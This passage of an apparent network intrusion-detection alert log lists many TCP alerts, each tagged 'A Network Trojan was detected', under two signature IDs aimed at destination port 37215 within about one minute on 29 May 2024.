                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088204
                SID:2829579
                Source Port:39888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899589
                SID:2835222
                Source Port:43822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964109
                SID:2835222
                Source Port:58678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628526
                SID:2835222
                Source Port:35282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664165
                SID:2829579
                Source Port:45022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221412
                SID:2829579
                Source Port:48038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558039
                SID:2829579
                Source Port:56000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277127
                SID:2829579
                Source Port:49140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384981
                SID:2835222
                Source Port:41820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902175
                SID:2829579
                Source Port:60930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.082045
                SID:2835222
                Source Port:51410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597122
                SID:2835222
                Source Port:43100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858420
                SID:2829579
                Source Port:37236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933197
                SID:2835222
                Source Port:39750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.609989
                SID:2829579
                Source Port:32956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233693
                SID:2829579
                Source Port:44104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.460320
                SID:2835222
                Source Port:49076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931719
                SID:2835222
                Source Port:39216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663828
                SID:2829579
                Source Port:52264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713973
                SID:2829579
                Source Port:57818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779318
                SID:2835222
                Source Port:50866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780760
                SID:2835222
                Source Port:58684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532321
                SID:2835222
                Source Port:40912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559205
                SID:2835222
                Source Port:50994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269161
                SID:2835222
                Source Port:53934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520606
                SID:2829579
                Source Port:45440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261459
                SID:2835222
                Source Port:57036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267627
                SID:2829579
                Source Port:36480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738198
                SID:2829579
                Source Port:48682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559586
                SID:2835222
                Source Port:59556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.622375
                SID:2835222
                Source Port:52950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885509
                SID:2835222
                Source Port:36624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506218
                SID:2829579
                Source Port:35466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663812
                SID:2835222
                Source Port:43860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895844
                SID:2835222
                Source Port:53036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779472
                SID:2829579
                Source Port:55780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815961
                SID:2835222
                Source Port:33940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166141
                SID:2829579
                Source Port:47818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264683
                SID:2829579
                Source Port:48268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420871
                SID:2829579
                Source Port:45410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.710642
                SID:2835222
                Source Port:37634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335820
                SID:2835222
                Source Port:43284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518915
                SID:2829579
                Source Port:48434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.276495
                SID:2835222
                Source Port:39884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502551
                SID:2829579
                Source Port:53836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728148
                SID:2829579
                Source Port:48214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662060
                SID:2829579
                Source Port:57642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518425
                SID:2835222
                Source Port:60406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567699
                SID:2829579
                Source Port:41586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418297
                SID:2835222
                Source Port:57426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617284
                SID:2835222
                Source Port:37074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208039
                SID:2835222
                Source Port:48228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891314
                SID:2829579
                Source Port:60798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321641
                SID:2829579
                Source Port:38350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210646
                SID:2835222
                Source Port:59194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013824
                SID:2835222
                Source Port:39892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848302
                SID:2829579
                Source Port:39808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359298
                SID:2829579
                Source Port:49108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133229
                SID:2835222
                Source Port:60354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263617
                SID:2835222
                Source Port:33894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914596
                SID:2835222
                Source Port:35264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767666
                SID:2835222
                Source Port:44412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628461
                SID:2835222
                Source Port:34116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.397355
                SID:2829579
                Source Port:48266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.818129
                SID:2835222
                Source Port:41354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285631
                SID:2829579
                Source Port:34754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.373814
                SID:2829579
                Source Port:39630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025115
                SID:2835222
                Source Port:38602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557034
                SID:2835222
                Source Port:42616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.557343
                SID:2829579
                Source Port:60996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261793
                SID:2835222
                Source Port:40274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814839
                SID:2829579
                Source Port:44294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.125216
                SID:2835222
                Source Port:51646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.787531
                SID:2829579
                Source Port:51826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091345
                SID:2829579
                Source Port:39744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654339
                SID:2835222
                Source Port:50304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778383
                SID:2835222
                Source Port:43500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136145
                SID:2829579
                Source Port:47212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804834
                SID:2829579
                Source Port:57888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794995
                SID:2829579
                Source Port:51594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.588770
                SID:2829579
                Source Port:41952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438055
                SID:2829579
                Source Port:53908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503565
                SID:2829579
                Source Port:52034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899063
                SID:2829579
                Source Port:58348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166742
                SID:2835222
                Source Port:33154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570694
                SID:2829579
                Source Port:40446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767713
                SID:2835222
                Source Port:59916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113859
                SID:2835222
                Source Port:46010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287119
                SID:2835222
                Source Port:54810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555914
                SID:2829579
                Source Port:57272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504213
                SID:2835222
                Source Port:34278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.533338
                SID:2829579
                Source Port:38286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.476512
                SID:2829579
                Source Port:48666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951580
                SID:2829579
                Source Port:53828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901210
                SID:2835222
                Source Port:50686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208848
                SID:2835222
                Source Port:59794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763901
                SID:2835222
                Source Port:47164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787182
                SID:2835222
                Source Port:45176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810389
                SID:2835222
                Source Port:47962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.732105
                SID:2829579
                Source Port:40536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848858
                SID:2835222
                Source Port:36828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970514
                SID:2835222
                Source Port:56608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.960616
                SID:2835222
                Source Port:53658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982931
                SID:2835222
                Source Port:36996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023844
                SID:2829579
                Source Port:46968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.803229
                SID:2829579
                Source Port:49308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643861
                SID:2829579
                Source Port:55220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500439
                SID:2829579
                Source Port:58028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042815
                SID:2829579
                Source Port:36868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624830
                SID:2835222
                Source Port:58694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.656082
                SID:2835222
                Source Port:52932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.827305
                SID:2835222
                Source Port:44894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335155
                SID:2835222
                Source Port:35990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.844339
                SID:2829579
                Source Port:57686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445675
                SID:2829579
                Source Port:57818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983329
                SID:2835222
                Source Port:60242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843516
                SID:2835222
                Source Port:58448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.338956
                SID:2829579
                Source Port:52938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781779
                SID:2835222
                Source Port:54816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163354
                SID:2835222
                Source Port:41408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836357
                SID:2835222
                Source Port:48560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331174
                SID:2829579
                Source Port:50626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900599
                SID:2835222
                Source Port:49536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598269
                SID:2835222
                Source Port:42890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781967
                SID:2829579
                Source Port:36428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.806809
                SID:2835222
                Source Port:46428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.042512
                SID:2829579
                Source Port:56048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.230928
                SID:2829579
                Source Port:47106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628459
                SID:2829579
                Source Port:41754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335453
                SID:2829579
                Source Port:40628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414675
                SID:2835222
                Source Port:40700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862531
                SID:2829579
                Source Port:42322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470206
                SID:2829579
                Source Port:54592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990761
                SID:2835222
                Source Port:55314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663878
                SID:2835222
                Source Port:52742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684774
                SID:2835222
                Source Port:34310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763255
                SID:2829579
                Source Port:59070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763342
                SID:2835222
                Source Port:42480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.786745
                SID:2829579
                Source Port:58292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.737155
                SID:2829579
                Source Port:57900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160179
                SID:2829579
                Source Port:42164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271188
                SID:2835222
                Source Port:44120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262379
                SID:2829579
                Source Port:45200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287996
                SID:2835222
                Source Port:48986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941900
                SID:2829579
                Source Port:59036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416060
                SID:2835222
                Source Port:55940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.572140
                SID:2829579
                Source Port:36856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443132
                SID:2829579
                Source Port:55754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189755
                SID:2835222
                Source Port:38722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.801290
                SID:2835222
                Source Port:47142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221705
                SID:2835222
                Source Port:36338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965608
                SID:2835222
                Source Port:54610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504428
                SID:2835222
                Source Port:48280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265581
                SID:2835222
                Source Port:34362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899558
                SID:2829579
                Source Port:60930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520107
                SID:2835222
                Source Port:54658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171828
                SID:2835222
                Source Port:49420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.918261
                SID:2835222
                Source Port:33054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.567347
                SID:2835222
                Source Port:55866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957619
                SID:2835222
                Source Port:60336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025419
                SID:2835222
                Source Port:47148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782180
                SID:2829579
                Source Port:42288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321836
                SID:2835222
                Source Port:42130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963877
                SID:2835222
                Source Port:37188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263755
                SID:2829579
                Source Port:56358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813196
                SID:2829579
                Source Port:56226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653304
                SID:2829579
                Source Port:54472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612922
                SID:2835222
                Source Port:38366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184770
                SID:2829579
                Source Port:33278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613193
                SID:2835222
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681603
                SID:2835222
                Source Port:47334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728373
                SID:2835222
                Source Port:54546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967539
                SID:2835222
                Source Port:56276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868155
                SID:2835222
                Source Port:44940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654981
                SID:2835222
                Source Port:54564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008476
                SID:2829579
                Source Port:38412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915470
                SID:2835222
                Source Port:58164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.018707
                SID:2835222
                Source Port:47642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207944
                SID:2835222
                Source Port:44130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335527
                SID:2835222
                Source Port:44636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962960
                SID:2835222
                Source Port:41396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.100176
                SID:2829579
                Source Port:40308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.796991
                SID:2829579
                Source Port:43756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818222
                SID:2829579
                Source Port:42724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025489
                SID:2829579
                Source Port:53292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261810
                SID:2835222
                Source Port:43642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010877
                SID:2835222
                Source Port:40404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765146
                SID:2829579
                Source Port:35792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987280
                SID:2829579
                Source Port:48690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.536721
                SID:2835222
                Source Port:44064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074689
                SID:2835222
                Source Port:58092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883922
                SID:2835222
                Source Port:56900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135766
                SID:2829579
                Source Port:51632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.733012
                SID:2829579
                Source Port:59984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928274
                SID:2835222
                Source Port:44352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.426211
                SID:2829579
                Source Port:40374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182428
                SID:2835222
                Source Port:48958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
